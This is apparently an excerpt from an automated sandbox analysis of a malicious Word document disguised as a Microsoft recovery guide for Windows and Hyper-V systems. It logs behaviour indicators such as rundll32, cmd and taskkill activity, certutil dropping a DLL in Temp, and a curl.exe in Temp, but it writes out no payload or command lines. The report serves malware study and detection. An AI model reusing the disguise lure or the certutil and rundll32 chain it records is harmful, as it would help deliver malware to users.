Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,_Smanip,16_2_00007FFD92BEE600
Source: C:\Users\user\AppData\Local\Temp\curl.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_13-41008
Source: C:\Windows\SysWOW64\certutil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mscorsvc.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\curl.exeAPI coverage: 5.4 %
Source: C:\Users\user\AppData\Local\Temp\curl.exeAPI coverage: 9.1 %
Source: C:\Windows\System32\rundll32.exe TID: 6552Thread sleep count: 82 > 30
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C0B230 _Bitmask_includes,operator&=,_Bitmask_includes,_Bitmask_includes,operator&=,_Bitmask_includes,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,operator&=,std::_Fs_file::_Fs_file,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,16_2_00007FFD92C0B230
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C0B1C0 __std_fs_close_handle,FindFirstFileExW,GetLastError,16_2_00007FFD92C0B1C0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF18C0 FindFirstFileW,new,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,FindNextFileW,FindClose,delete,delete,16_2_00007FFD92BF18C0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92CCDD10 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,16_2_00007FFD92CCDD10
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C95E80 GetSystemInfo,16_2_00007FFD92C95E80
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\
Source: document.xmlBinary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V Settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xmlBinary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: rundll32.exe, 00000010.00000002.5553191262.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.4258778994.0000027F6C3D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259308541.0000027F6C3D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: document.xmlBinary or memory string: </w:t></w:r><w:hyperlink r:id="rId9" w:tgtFrame="_self" w:history="1"><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="146CAC"/><w:u w:val="single"/></w:rPr><w:t>https://go.microsoft.com/fwlink/?linkid=2280386</w:t></w:r></w:hyperlink><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:</w:t></w:r></w:p><w:p w14:paraId="49DFB7AB" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="5"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Recover from WinPE</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: curl.exe, 0000000D.00000003.2188986234.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2189060757.00000000033F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: document.xmlBinary or memory string: </w:t></w:r></w:p><w:p w14:paraId="70D69DE5" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Steps to Recover Hyper-V virtual machines</w:t></w:r></w:p><w:p w14:paraId="74745A04" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="10"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>On an impacted virtual machine, add a DVD Drive under
Source: rundll32.exe, 00000010.00000003.2451014222.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2540593407.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2416797193.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2550439735.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2500142406.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2430247545.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2257877794.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479616705.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461554328.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2429834267.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510194846.0000020A783B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: document.xmlBinary or memory string: </w:t></w:r></w:p><w:p w14:paraId="5A9C771D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Using recovery media on Hyper-V virtual machines</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t xml:space="preserve"> The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.</w:t></w:r></w:p><w:p w14:paraId="3F927671" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" 